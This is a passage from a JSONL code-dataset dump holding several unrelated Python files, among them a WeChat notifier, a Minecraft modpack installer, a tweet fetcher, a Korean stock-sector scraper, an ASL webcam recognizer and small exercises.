self.token_url = wechat_conf[\"token_url\"]\n self.msg_url = wechat_conf[\"msg_url\"]\n\n def send(self, subject, msg, url):\n msg = self.normalize(msg)\n payload = {\n \"touser\": \"\",\n \"toparty\": self.party,\n \"msgtype\": \"news\",\n \"agentid\": self.agentid,\n \"news\": {\n \"articles\":\n [\n {\n \"title\": subject,\n \"description\": msg,\n \"url\": url,\n \"picurl\": \"\"\n }\n ]\n },\n \"safe\": \"0\"\n }\n\n r = requests.post(self.msg_url + \"?access_token=\" + self.get_token(),\n data=simplejson.dumps(payload, ensure_ascii=False).encode('utf8'),\n headers={'Content-type':'application/json', 'charset': 'utf-8'})\n return r\n\n def get_token(self):\n payload = {\n \"corpid\": self.corpid,\n \"corpsecret\": self.corpsecret\n }\n r = requests.get(self.token_url, params=payload)\n data = ast.literal_eval(r.text)\n return data[\"access_token\"]\n\n def normalize(self, broker_message):\n msg = broker_message\n return msg\n","repo_name":"flyyang/medical-news","sub_path":"wechat.py","file_name":"wechat.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"21"} +{"seq_id":"72249603253","text":"import requests\nimport os\n\nfrom bs4 import BeautifulSoup\nfrom zipfile import ZipFile\nfrom json import loads, dumps\nfrom pathlib import Path\nfrom urllib.parse import unquote\nfrom sys import stdout\nfrom API.MultiMC import InstanceCfg, ForgePatch\nfrom shutil import copytree, rmtree\n\nfrom Utils.Utils import moveTree\nfrom GUI.Strings import Strings\nfrom CurseMetaDB.DB import DB\n\nuseUserAgent = \"Mozilla/5.0 (Windows NT 10.0; rv:50.0) Gecko/20100101 Firefox/50.0\"\n\nstrings = Strings()\ntranslate = strings.get\n\n\nclass CurseAPI:\n \"\"\"Curse API\"\"\"\n\n motd = \"\"\"\n _|_| _| _| _| _|\n _| _| _|_| _|_| _|_| _|_|\n _| _| _| _| _| _| _| _|\n _| _| _| _| _| _|\n _|_| _| _| _| _|\n \"\"\"\n\n version = \"2.1.5\"\n baseUrl = \"https://mods.curse.com\"\n forgeUrl = \"https://minecraft.curseforge.com\"\n\n def __init__(self, db: DB):\n self.db = db\n\n # Set User Agent header for extra sneakyness\n self.session = requests.Session()\n self.session.headers.update({\"User-Agent\": useUserAgent})\n\n # SECTION MODS\n\n def get_mod_list(self, version=\"*\"):\n \"\"\"Get an array of `CurseProject`s\"\"\"\n mods = self.db.get_popular(\"mod\", 25, version)\n return [self.get_project(i) for i in mods]\n\n def get_project(self, pid: int):\n mod = self.db.get_project(pid)\n if not mod:\n return False\n return CurseProject(mod)\n\n def get_file(self, fid: int):\n file = self.db.get_file(fid)\n if not file:\n return False\n return CurseFile(file)\n\n # END SECTION\n\n # SECTION MODPACKS\n\n def get_modpacks(self, version=\"*\"):\n packs = self.db.get_popular(\"modpack\", 25, version)\n return [CurseProject(self.db.get_project(i)) for i in packs]\n\n # END SECTION\n\n # SECTION UTILS\n\n def search(self, query: str, ptype=\"mod\", version=\"*\"):\n res = self.db.search_projects(query, ptype, 25, version=version)\n return [CurseProject(i) for i in res]\n\n def download_file(self, url: str, filepath: str, fname=\"\", progf=False):\n \"\"\"Download a file from `url` to `filepath/name`\"\"\"\n r = self.session.get(url, stream=True)\n dlen = r.headers.get(\"content-length\")\n step = (100 / int(dlen))\n prog = 0\n if not fname:\n fname = unquote(Path(r.url).name)\n with open(filepath+\"/\"+fname, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n prog += len(chunk)\n if progf:\n progf(int(step * prog))\n f.write(chunk)\n if progf:\n progf(0)\n return filepath+\"/\"+fname\n\n def get(self, params={}, path=\"\", host=\"\", includeUrl=False):\n \"\"\"HTTP GET with HTML parsing\"\"\"\n if not host:\n host = self.baseUrl\n r = self.session.get(host + path, params=params)\n html = r.text\n if includeUrl:\n return [BeautifulSoup(html, \"html.parser\"), r.url]\n return BeautifulSoup(html, \"html.parser\")\n\n # END SECTION\n\n\nclass CurseProject:\n def __init__(self, meta: dict):\n self.meta = meta\n\n self.id = self.meta[\"id\"]\n\n self.type = self.meta[\"type\"]\n\n self.name = self.meta[\"title\"]\n self.author = self.meta[\"primaryAuthor\"]\n self.desc = self.meta[\"desc\"]\n\n self.page = self.meta[\"site\"]\n\n self.versions = self.meta[\"versions\"]\n self.files = self.meta[\"files\"]\n\n self.attachments = self.meta[\"attachments\"]\n if len(self.attachments) > 0:\n self.default_attachment = [i for i in self.attachments if i[\"default\"]][0]\n else:\n self.default_attachment = False\n\n\nclass CurseFile:\n def __init__(self, f: dict):\n self.f = f\n\n self.id = self.f[\"id\"]\n self.pub_time = self.f[\"date\"]\n self.versions = self.f[\"versions\"]\n\n self.deps = self.f[\"dependencies\"]\n\n self.dl = self.f[\"url\"]\n\n self.filename = self.f[\"filename\"]\n self.project = self.f[\"project\"]\n\n\nclass CurseModpack:\n \"\"\"Get information from a modpack\"\"\"\n\n from API.MultiMC import MultiMC\n\n def __init__(self, project: CurseProject, curse: CurseAPI, mmc: MultiMC):\n self.project = project\n self.curse = curse\n self.mmc = mmc\n\n self.installed = False\n\n if os.name == \"nt\":\n self.installLocation = \"{}\\\\instances\\\\{}\\\\\".format(self.mmc.path, self.project.name)\n else:\n self.installLocation = \"{}/instances/{}/\".format(self.mmc.path, self.project.name)\n\n self.mmc = mmc\n\n def install(self, file: CurseFile, prog_label, progbar_1, progbar_2, is_update=False):\n if is_update:\n print(\"WARNING: UPDATING IS STILL EXPERIMENTAL\")\n\n safe_name = self.project.name + \"\"\n for c in \"\\\\/:*?\\\"<>|\":\n safe_name = safe_name.replace(c, '')\n\n tempPath = \"{}/instances/_MMC_TEMP/{}\".format(self.mmc.path, safe_name)\n\n progbar_1(0)\n\n prog_label(translate(\"downloading.icon\"))\n\n if self.project.default_attachment:\n ft = self.project.default_attachment[\"url\"].split(\".\")[-1]\n self.curse.download_file(self.project.default_attachment[\"url\"], \"{}/icons\".format(self.mmc.path),\n \"{}.{}\".format(self.project.id, ft), progf=progbar_2)\n\n if os.path.exists(tempPath):\n rmtree(tempPath)\n\n # Create instance temp folder if doesn't exist\n if not os.path.exists(tempPath):\n os.makedirs(tempPath)\n\n progbar_1(5)\n\n prog_label(translate(\"downloading.data\"))\n\n packFile = self.curse.download_file(file.dl, tempPath, progf=progbar_2)\n\n # Unpack zip file\n zipf = ZipFile(packFile)\n zipf.extractall(\"{}/raw\".format(tempPath))\n zipf.close()\n\n # Delete ZIP file\n os.remove(packFile)\n\n # Parse Manifest\n manifest = ModpackManifest(\"{}/raw/manifest.json\".format(tempPath))\n\n # Overrides\n mcPath = \"{}/minecraft\".format(tempPath)\n\n if os.path.exists(\"{}/raw/overrides\".format(tempPath)):\n copytree(\"{}/raw/overrides\".format(tempPath), mcPath)\n else:\n os.makedirs(mcPath)\n\n # Make mods folder\n modPath = \"{}/mods\".format(mcPath)\n if not os.path.exists(modPath):\n os.makedirs(modPath)\n\n # Make Patches Folder\n patchPath = \"{}/patches\".format(tempPath)\n if not os.path.exists(patchPath):\n os.makedirs(patchPath)\n\n # Configure Instance\n instanceCfg = InstanceCfg(manifest.mcVersion, manifest.forgeVersion, self.project.name, icon=str(self.project.id))\n instanceCfg.write(\"{}/instance.cfg\".format(tempPath))\n\n # Configure Forge\n forgeCfg = ForgePatch(manifest.mcVersion, manifest.forgeVersion)\n forgeCfg.write(patchPath+\"/net.minecraftforge.json\")\n\n modlist = list()\n\n progbar_1(10)\n\n modf = (90 / len(manifest.mods))\n\n newPath = \"{}/instances/{}\".format(self.mmc.path, safe_name)\n\n ignore_files = list()\n\n if not is_update:\n while os.path.exists(newPath):\n newPath += \"_\"\n else:\n from API.MultiMC import MultiMCInstance\n inst = MultiMCInstance(newPath)\n\n nmds = [i[1] for i in manifest.mods]\n npids = [i[0] for i in manifest.mods]\n\n for mod in inst.mods:\n if mod[\"id\"] in nmds:\n ignore_files.append(mod[\"id\"])\n modlist.append(mod)\n elif not mod[\"manual\"] or self.curse.get_file(mod[\"id\"]).project in npids:\n inst.uninstall_mod(mod[\"path\"])\n else:\n modlist.append(mod)\n\n for x, mod in enumerate(manifest.mods):\n if mod[1] in ignore_files:\n continue\n #stdout.write(\"\\rDownloading mod {}/{}\".format(x+1, len(manifest.mods)))\n f = self.curse.get_file(mod[1])\n if not f:\n continue\n\n prog_label(translate(\"downloading.mod\").format(f.filename))\n progbar_1(10 + (x * modf))\n mpath = self.curse.download_file(f.dl, modPath, progf=progbar_2)\n modlist.append({\"id\": mod[1], \"path\": mpath.replace(tempPath, newPath), \"manual\": False})\n stdout.write(\"\\n\\r\")\n\n open(\"{}/omm_dat.json\".format(tempPath), \"w+\").write(dumps({\n \"file\": file.id,\n \"mods\": modlist\n }, indent=4))\n\n rmtree(\"{}/raw\".format(tempPath))\n\n if not os.path.exists(newPath):\n os.makedirs(newPath)\n moveTree(tempPath, newPath)\n if os.path.exists(tempPath):\n rmtree(tempPath)\n\n\nclass ModpackManifest:\n \"\"\"Parse a modpack's manifest.json\"\"\"\n def __init__(self, filename: str):\n self.filename = filename\n\n self.json = loads(open(self.filename).read())\n\n self.mcVersion = self.json[\"minecraft\"][\"version\"]\n self.forgeVersion = self.json[\"minecraft\"][\"modLoaders\"][0][\"id\"].replace(\"forge-\", '')\n\n self.mods = [[i[\"projectID\"], i[\"fileID\"]] for i in self.json[\"files\"]]\n\n\nclass SearchType:\n Mod = \"mc-mods\"\n Modpack = \"modpacks\"\n Texturepack = \"customiaztion\"\n","repo_name":"OpenMineMods/OpenMineMods","sub_path":"API/CurseAPI.py","file_name":"CurseAPI.py","file_ext":"py","file_size_in_byte":9419,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"72775105334","text":"#code before lecture\n\nstring=input()\nnum=\"0123456789\"\ncnt=0\nN=\"\"\nfor x in string:\n if x in num:\n N+=x\nN=int(N)\n\nfor i in range(1,N+1):\n if N%i==0:\n cnt+=1\n\nprint(N)\nprint(cnt)\n\n#code from lecture\ns=input()\nres=0\nfor x in s:\n if x.isdecimal():\n res=res*10+int(x)\nprint(res)\ncnt=0\nfor i in range(1,res+1):\n if res%i==0:\n cnt+=1\nprint(cnt)","repo_name":"JangAyeon/Algorithm","sub_path":"탐색&시뮬레이션/숫자만추출.py","file_name":"숫자만추출.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73366370612","text":"import sys\nimport datetime\nimport json\nimport os\nimport re\nimport time\nimport traceback\nimport argparse\nfrom pathlib import Path\nfrom concurrent.futures import ThreadPoolExecutor\nimport itertools\n\nimport backoff\nimport pandas as pd\n\nimport punisher.constants as c\nimport punisher.config as cfg\nfrom punisher.clients import s3_client\nfrom punisher.clients import twitter_client\nfrom punisher.utils.dates import str_to_date\nfrom punisher.utils.encoders import JSONEncoder\nimport punisher.utils.logger as logger_utils\n\n\nparser = argparse.ArgumentParser(description='Historical Tweet Fetcher')\nparser.add_argument('-q', '--query', help='Query in the format https://twitter.com/search-advanced', type=str)\nparser.add_argument('-s', '--start', help='start time yyyy-mm-dd', default=None, type=str)\nparser.add_argument('-e', '--end', help='end time yyyy-mm-dd', default=None, type=str)\nparser.add_argument('-m', '--max', help='Max tweets to pull each day', default=1000, type=int)\nparser.add_argument('-w', '--workers', help='number of workers in pool', default=1, type=int)\nparser.add_argument('-r', '--retries', help='max number of retries', default=15, type=int)\nparser.add_argument('--filter', help='Include only tweets w at least one like or retweet', action='store_true')\nparser.add_argument('--top', help='Include only tweets from Twitters \"top tweets\" list', action='store_true')\nparser.add_argument('--action', help='\"fetch\" from twitter, \"download\" from s3, or \"list\" files in S3',\n choices=['fetch','download', 'list'], required=True)\nparser.add_argument('--upload', help='upload to s3 after fetching from exchange', action='store_true')\nparser.add_argument('--cleanup', help='remove local copy of files after s3 upload', action='store_true')\nparser.add_argument('-o', '--outdir', help='output directory to save files', default=cfg.DATA_DIR, type=str)\nparser.add_argument('-l', '--lang', type=str, default='en',\n help=\"Set this flag if you want to query tweets in \\na specific language. You can choose from:\\n\"\n \"en (English)\\nar (Arabic)\\nbn (Bengali)\\n\"\n \"cs (Czech)\\nda (Danish)\\nde (German)\\nel (Greek)\\nes (Spanish)\\n\"\n \"fa (Persian)\\nfi (Finnish)\\nfil (Filipino)\\nfr (French)\\n\"\n \"he (Hebrew)\\nhi (Hindi)\\nhu (Hungarian)\\n\"\n \"id (Indonesian)\\nit (Italian)\\nja (Japanese)\\n\"\n \"ko (Korean)\\nmsa (Malay)\\nnl (Dutch)\\n\"\n \"no (Norwegian)\\npl (Polish)\\npt (Portuguese)\\n\"\n \"ro (Romanian)\\nru (Russian)\\nsv (Swedish)\\n\"\n \"th (Thai)\\ntr (Turkish)\\nuk (Ukranian)\\n\"\n \"ur (Urdu)\\nvi (Vietnamese)\\n\"\n \"zh-cn (Chinese Simplified)\\n\"\n \"zh-tw (Chinese Traditional)\"\n )\n# python -m punisher.data.tweet_fetcher --query \"bitcoin OR btc\" --start 2016-01-01\n# --end 2016-01-02 --lang en --max 10 --upload --top --filter --action fetch --cleanup\n\nargs = parser.parse_args()\nTWITTER = 'twitter'\nTWITTER_DIR = Path(args.outdir, TWITTER)\nTWITTER_DIR.mkdir(exist_ok=True)\nMAX_RETRIES = args.retries\n\ndef get_s3_path(query, lang, date):\n fname = twitter_client.get_tweet_query_fname(query, lang, date)\n query = query.replace(' ', '_')\n return TWITTER + '/' + query + '/' + fname\n\ndef upload_to_s3(query, lang, date):\n fpath = twitter_client.get_tweet_query_fpath(query, lang, date, TWITTER_DIR)\n s3_path = get_s3_path(query, lang, date)\n print('Uploading to s3:', s3_path)\n s3_client.upload_file(str(fpath), s3_path)\n\n@backoff.on_exception(backoff.expo,\n Exception, #TODO: include twitter exceptions only\n on_backoff=logger_utils.retry_hdlr,\n on_giveup=logger_utils.giveup_hdlr,\n max_tries=MAX_RETRIES)\ndef fetch_tweets(query, start, end, max_tweets, lang,\n filter_tweets, top_tweets, upload, cleanup):\n \"\"\"\n Downloads historical tweets from twitter in daily increments\n\n Parameters:\n query = 'bitcoin OR btc'\n start = datetime.datetime(year=2018, month=2, day=4)\n end = datetime.datetime(year=2018, month=2, day=6)\n \"\"\"\n time_delta = datetime.timedelta(days=1)\n cur_start = start\n while cur_start < end:\n cur_end = cur_start + time_delta\n print(\"Start\", cur_start, \"End\", cur_end)\n tweets = twitter_client.fetch_tweets(\n query, start, end, max_tweets, lang,\n filter_tweets, top_tweets\n )\n print(\"Downloaded\", len(tweets))\n twitter_client.save_query_tweets(tweets, query, lang, cur_start)\n if upload:\n upload_to_s3(query, lang, cur_start)\n if cleanup:\n fpath = twitter_client.get_tweet_query_fpath(query, lang, cur_start, TWITTER_DIR)\n os.remove(fpath)\n cur_start = cur_end\n\ndef download_from_s3(query, start_date):\n \"\"\" Download query files for all dates \"\"\"\n query = query.replace(' ', '_')\n prefix = TWITTER + '/' + query\n keys = s3_client.list_files(prefix=prefix)\n fpaths = []\n for key in keys:\n fpath = Path(TWITTER_DIR, query, Path(key).name)\n fpaths.append(fpath)\n print(\"Downloading from s3\", fpath)\n s3_client.download_file(str(fpath), key)\n\ndef list_files():\n keys = s3_client.list_files(pattern=TWITTER)\n reg = re.compile('twitter\\/([a-z0-9A-Z#\\$\\_]+)\\/([a-z0-9A-Z#\\$\\_]+)_(20[0-9]+)_([0-9]+)_([0-9]+).json')\n meta = {}\n for key in keys:\n m = re.match(reg, key)\n if m is not None:\n query, fname, year, month, day = m.groups()\n start = datetime.datetime(year=int(year), month=int(month), day=int(day))\n if query not in meta:\n meta[query] = {\n 'start': start,\n 'end': start + datetime.timedelta(days=1)\n }\n else:\n meta[query] = {\n 'start': min(start, meta[query]['start']),\n 'end': max(start+datetime.timedelta(days=1), meta[query]['end'])\n }\n return meta\n\ndef fetch_tweets_async(query, start, end, max_tweets, lang, filter_tweets,\n top_tweets, upload, cleanup, workers):\n days = (end - start).days\n start_dates = [start + datetime.timedelta(days=d) for d in range(days)]\n end_dates = [date + datetime.timedelta(days=1) for date in start_dates]\n with ThreadPoolExecutor(max_workers=workers) as executor:\n _ = executor.map(\n fetch_tweets, itertools.repeat(query), start_dates, end_dates,\n itertools.repeat(max_tweets), itertools.repeat(lang),\n itertools.repeat(filter_tweets), itertools.repeat(top_tweets),\n itertools.repeat(upload), itertools.repeat(cleanup)\n )\n\nif __name__ == \"__main__\":\n action = args.action\n start = str_to_date(args.start) if args.start is not None else None\n end = str_to_date(args.end) if args.end is not None else None\n\n if args.cleanup:\n assert args.upload is True\n if action == 'fetch':\n assert start is not None and end is not None\n\n if action == 'list':\n print('Listing files in S3')\n file_metadata = list_files()\n print(json.dumps(file_metadata, indent=4, cls=JSONEncoder))\n\n elif action == 'fetch':\n print('Fetching from twitter: ', args.query, 'start:', start, 'end:', end)\n if args.workers > 1:\n fetch_tweets_async(\n args.query, start, end, args.max, args.lang, args.filter,\n args.top, args.upload, args.cleanup, args.workers\n )\n else:\n fetch_tweets(\n args.query, start, end, args.max, args.lang,\n args.filter, args.top, args.upload, args.cleanup\n )\n\n elif action == 'download':\n print('Downloading from S3: ', args.query)\n download_from_s3(args.query, start)\n\n else:\n raise Exception(\"Action {:s} not supported!\".format(action))\n","repo_name":"bfortuner/punisher","sub_path":"punisher/data/tweet_fetcher.py","file_name":"tweet_fetcher.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"72942642293","text":"from django.contrib import admin\nfrom .models import *\n\n# Register your models here.\nclass SignupData(admin.ModelAdmin):\n #ordering=['id']\n list_display=['id','firstname','email']\n\nclass notesAdmin(admin.ModelAdmin):\n list_display=['title','option','file','comment']\n\n\n\nadmin.site.register(signup,SignupData)\nadmin.site.register(notes,notesAdmin)","repo_name":"rohitghatar/NotesApp","sub_path":"note_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2696332657","text":"\nfrom __future__ import print_function\nimport numpy as np\n#import matplotlib.pyplot as plt\ndef filter_marker(input_fname='input.particles', \\\n fname_out='input.particles_filt',\\\n minrho=0.8, minxi=-1., maxxi=1., sign=1, max_markers=30000, maxrho=5.):\n\n \"\"\" Filter markers\n\n Script to filter the input.particles file (useful for wall-losses studies) \n basing on rho and xi\n\n markers, markers_towrite, pitch, indnew = filter_marker.filter_marker(input_fname, \\\n fname_out, minrho, minxi, maxxi, sign, max_markers, max_rho)\n\n Parameters:\n | input_fname (str) : name of file to read (default input.particles)\n | fname_out (str) : name of file where to write (default input.particles_filt)\n | minrho (float) : minimum rho (particles will be chosen after this rho value)\\\n (default is 0.8)\n | minxi (float) : minimum pitch allowable (default is -1)\n | maxxi (float) : maximum pitch allowable (default is 1) \n \n Arguments:\n | markers_towrite (array) : matrix with data of markers selected\n | markers (array) : matrix with read data\n | pitch (array) : pitch of data to be written\n | indnew (array) : array with the indices of the selected markers\n \"\"\"\n\n fin = open(input_fname,\"r\")\n lines=fin.readlines()\n for ind, ll in enumerate(lines):\n tmpl = ll.split()\n if 'fields' in tmpl:\n nfields = int(tmpl[0])\n ind_countrho = ind\n elif 'particles' in tmpl:\n nmarkers = int(tmpl[0])\n ind_nmarkers = ind\n elif 'flux' in tmpl:\n indrho = ind-ind_countrho-1\n elif 'velocity' in tmpl:\n if 'toroidal' in tmpl:\n indvphi = ind-ind_countrho-1\n elif 'vertical' in tmpl:\n indvz = ind-ind_countrho-1\n elif 'radial' in tmpl:\n indvr = ind-ind_countrho-1\n elif 'weight' in tmpl:\n indweight = ind-ind_countrho-1\n elif 'magnetic' in tmpl:\n if 'toroidal' in tmpl:\n indBphi = ind-ind_countrho-1\n elif 'vertical' in tmpl:\n indBz = ind-ind_countrho-1\n elif 'radial' in tmpl:\n indBr = ind-ind_countrho-1\n\n try:\n float(tmpl[1])\n except:\n continue\n ind_markerstart = ind\n break\n \n header = lines[0:ind_markerstart-1]\n markers = np.zeros((nmarkers, nfields))\n for ind, ll in enumerate(lines[ind_markerstart:-1]):\n tmp = ll.split()\n markers[ind,:] = tmp[:]\n vtot = np.sqrt(markers[:, indvphi]**2+markers[:, indvz]**2+markers[:, indvr]**2)\n \n modB = np.sqrt(markers[:, indBphi]**2+markers[:, indBz]**2+markers[:, indBr]**2)\n vdotB = markers[:, indBphi]*markers[:, indvphi]+markers[:, indBz]*markers[:, indvz]+markers[:, indBr]*markers[:, indvr]\n pitch = vdotB/(modB*vtot)\n #vvparallel = vdotB/modB**2*[markers[:, indBphi], markers[:, indBz], markers[:, indBr]]\n #vparallel = np.sqrt(np.power(vvparallel[0,:],2)+np.power(vvparallel[1,:],2)+np.power(vvparallel[2,:],2))\n #pitch = sign*vparallel/vtot\n \n indnew = np.where(np.logical_and(np.logical_and(markers[:,indrho] > minrho, markers[:,indrho]minxi, pitch 0:\n gr1 = str('+' + gr1)\n else:\n gr1 = str(gr1)\n gr2 = round((price / data['Close'][-2] - 1) * 100, 2)\n gr2 = str(gr2) + '%'\n\n return str.upper(stock), round(price, 2), date, gr1, gr2\n\n# import time\n# start_time = time.time()\n# print(get_list_of_stock('poly'))\n# print(\"--- %s seconds ---\" % (time.time() - start_time))","repo_name":"dzbarts/Financial-Analyser","sub_path":"CORE/Stock.py","file_name":"Stock.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11777178164","text":"# 국내주식 크롤링 (Investar 참고)\n# 0. WICS 기준 섹터기준 분류\n# 1. 종목 정보 크롤링\n# 2. DB 생성 및 저장\n# 3. 일별 자동생성\n\nimport pandas as pd\nfrom datetime import datetime\nimport pymysql\nimport calendar\nimport requests\nfrom threading import Timer\n\nclass DMDBUpdater:\n def __init__(self):\n self.conn = ''\n with self.conn.cursor() as curs:\n sql = \"\"\"\n CREATE TABLE IF NOT EXISTS stock_info (\n code VARCHAR(20),\n name VARCHAR(40),\n sector_l VARCHAR(20),\n sector_m VARCHAR(20),\n mktval BIGINT,\n wgt FLOAT,\n last_update DATE,\n PRIMARY KEY (last_update, code)\n )\n \"\"\"\n curs.execute(sql)\n self.conn.commit()\n self.codes = dict() # code_temp\n\n def get_sectors(self):\n sector = {1010: '에너지',\n 1510: '소재',\n 2010: '자본재',\n 2020: '상업서비스와공급품',\n 2030: '운송',\n 2510: '자동차와부품',\n 2520: '내구소비재와의류',\n 2530: '호텔,레스토랑,레저 등',\n 2550: '소매(유통)',\n 2560: '교육서비스',\n 3010: '식품과기본식료품소매',\n 3020: '식품,음료,담배',\n 3030: '가정용품과개인용품',\n 3510: '건강관리장비와서비스',\n 3520: '제약과생물공학',\n 4010: '은행',\n 4020: '증권',\n 4030: '다각화된금융',\n 4040: '보험',\n 4050: '부동산',\n 4510: '소프트웨어와서비스',\n 4520: '기술하드웨어와장비',\n 4530: '반도체와반도체장비',\n 4535: '전자와 전기제품',\n 4540: '디스플레이',\n 5010: '전기통신서비스',\n 5020: '미디어와엔터테인먼트',\n 5510: '유틸리티'}\n return sector\n\n def update_stock_info(self):\n date = '20211020'\n df = pd.DataFrame(columns=['code', 'name', 'sector_l', 'sector_m', 'mktval', 'wgt'])\n sector = self.get_sectors()\n for i, sec_code in enumerate(sector.keys()):\n response = requests.get('http://www.wiseindex.com/Index/GetIndexComponets?ceil_yn=0&''dt=' + date + '&sec_cd=G' + str(sec_code))\n if (response.status_code == 200):\n json_list = response.json()\n for json in json_list['list']:\n code = json['CMP_CD']\n name = json['CMP_KOR']\n sector_l = json['SEC_NM_KOR']\n sector_m = json['IDX_NM_KOR'][5:]\n mktval = json['MKT_VAL']\n wgt = json['WGT']\n df = df.append(\n {'code': code, 'name': name, 'sector_l': sector_l, 'sector_m': sector_m, 'mktval': mktval,'wgt': wgt}, ignore_index=True)\n with self.conn.cursor() as curs:\n sql = \"SELECT max(last_update) from stock_info\"\n curs.execute(sql)\n rs = curs.fetchone() # last_update\n today = datetime.today().strftime('%Y-%m-%d')\n if rs[0] == None or rs[0].strftime('%Y-%m-%d') < today:\n sql = \"DELETE FROM stock_info\"\n curs.execute(sql)\n self.conn.commit()\n for idx in range(len(df)):\n code = df.code.values[idx]\n name = df.name.values[idx]\n sector_l = df.sector_l.values[idx]\n sector_m = df.sector_m.values[idx]\n mktval = df.mktval.values[idx]\n wgt = df.wgt.values[idx]\n today = datetime.today().strftime('%Y-%m-%d')\n sql = f\"INSERT INTO stock_info (code, name, sector_l, sector_m, mktval, wgt, last_update) \" \\\n f\"VALUES ('{code}', '{name}', '{sector_l}','{sector_m}', '{mktval}', '{wgt}', '{today}')\"\n curs.execute(sql)\n tmnow = datetime.now().strftime('%Y-%m-%d %H:%M')\n print(f\"[{tmnow}] #{idx + 1:04d} INSERT INTO stock_info \" \\\n f\"VALUES ({code}, {name}, {today})\")\n self.conn.commit()\n\n def __del__(self):\n self.conn.close()\n\n def execute_daily(self):\n self.update_stock_info()\n tmnow = datetime.now()\n lastday = calendar.monthrange(tmnow.year, tmnow.month)[1]\n if tmnow.month == 12 and tmnow.day == lastday:\n tmnext = tmnow.replace(year=tmnow.year + 1, month=1, day=1,\n hour=17, minute=0, second=0)\n elif tmnow.day == lastday:\n tmnext = tmnow.replace(month=tmnow.month + 1, day=1, hour=17,\n minute=0, second=0)\n else:\n tmnext = tmnow.replace(day=tmnow.day + 1, hour=17, minute=0,\n second=0)\n tmdiff = tmnext - tmnow\n secs = tmdiff.seconds\n t = Timer(secs, self.execute_daily)\n print(\"Waiting for next update ({}) ... \".format(tmnext.strftime('%Y-%m-%d %H:%M')))\n t.start()\n\nif __name__ == '__main__':\n DMDBUpdater().execute_daily()","repo_name":"neusj47/database","sub_path":"DMDB_Updater.py","file_name":"DMDB_Updater.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41067097992","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 8 17:19:50 2019\n\n@author: Administrator\n\"\"\"\n\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nboston = datasets.load_boston();\nX = boston.data;\nY = boston.target;\nprint(X.shape)\nprint(boston)\n#plt.scatter(X['RM'],Y,color='blue')\n#plt.scatter(X['LSTAT'],Y,color='blue')","repo_name":"ivileey/python","sub_path":"other/项目一线性回归分析入门之波士顿房价预测.py","file_name":"项目一线性回归分析入门之波士顿房价预测.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34598202042","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\nfrom backend import load_model, predict_custom\nimport streamlit as st\nfrom streamlit_webrtc import VideoTransformerBase, webrtc_streamer\n\nmodel = load_model(model_path='./20210711-162248-big-one.h5')\n\nmphands = mp.solutions.hands\nhands = mphands.Hands()\nmp_drawing = mp.solutions.drawing_utils\n\nclass VideoTransformer(VideoTransformerBase):\n\n def transform(self, frame):\n frame = frame.to_ndarray(format=\"bgr24\")\n h, w, c = frame.shape\n result = hands.process(frame)\n pred, conf = predict_custom(image=frame, model=model)\n hand_landmarks = result.multi_hand_landmarks\n if hand_landmarks:\n for handLMs in hand_landmarks:\n x_max = 0\n y_max = 0\n x_min = w\n y_min = h\n for lm in handLMs.landmark:\n x, y = int(lm.x * w), int(lm.y * h)\n if x > x_max:\n x_max = x\n if x < x_min:\n x_min = x\n if y > y_max:\n y_max = y\n if y < y_min:\n y_min = y\n# cv2.rectangle(frame, (x_min, y_min), (x_max, y_max), (130, 255, 20), 5)\n mp_drawing.draw_landmarks(frame, handLMs, mphands.HAND_CONNECTIONS)\n frame = cv2.putText(frame, f\"{pred}, {conf}\", (x_min, y_min - 10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)\n \n return frame \n \n","repo_name":"Chiraagkv/ASL","sub_path":"webrtc.py","file_name":"webrtc.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"34421711148","text":"# -*- coding: utf-8 -*-\n# pylint: disable=missing-module-docstring\n\n# import...\n# ...from HydPy\nfrom hydpy.core import parametertools\n\n\nclass K(parametertools.Parameter):\n \"\"\"Storage coefficient [1/T].\n\n For educational purposes, the actual value of parameter |K| does\n not depend on the difference between the actual simulation time step and\n the actual parameter time step.\n \"\"\"\n\n NDIM, TYPE, TIME, SPAN = 0, float, None, (0.0, None)\n\n\nclass N(parametertools.Parameter):\n \"\"\"Number of storages [-].\"\"\"\n\n NDIM, TYPE, TIME, SPAN = 0, int, None, (1, None)\n\n def __call__(self, *args, **kwargs) -> None:\n super().__call__(*args, **kwargs)\n seqs = self.subpars.pars.model.sequences\n seqs.states.sv.shape = self.value\n seqs.fluxes.qv.shape = self.value\n","repo_name":"hydpy-dev/hydpy","sub_path":"hydpy/models/test/test_control.py","file_name":"test_control.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"21"} +{"seq_id":"42418405951","text":"# find all the possible permutations of a given array\n# Need to check why append is not working properly\ntempAns=[]\ndef permutations1(arr, index): \n if index==len(arr): \n tempAns.append(arr.copy()) \n return \n for i in range(index,len(arr)):\n arr[i],arr[index]=arr[index],arr[i] \n permutations1(arr, index+1)\n arr[i],arr[index]=arr[index],arr[i] \n return\n\npermutations1([1,2,3],0)\nprint(tempAns)\n\n# in built code\n# 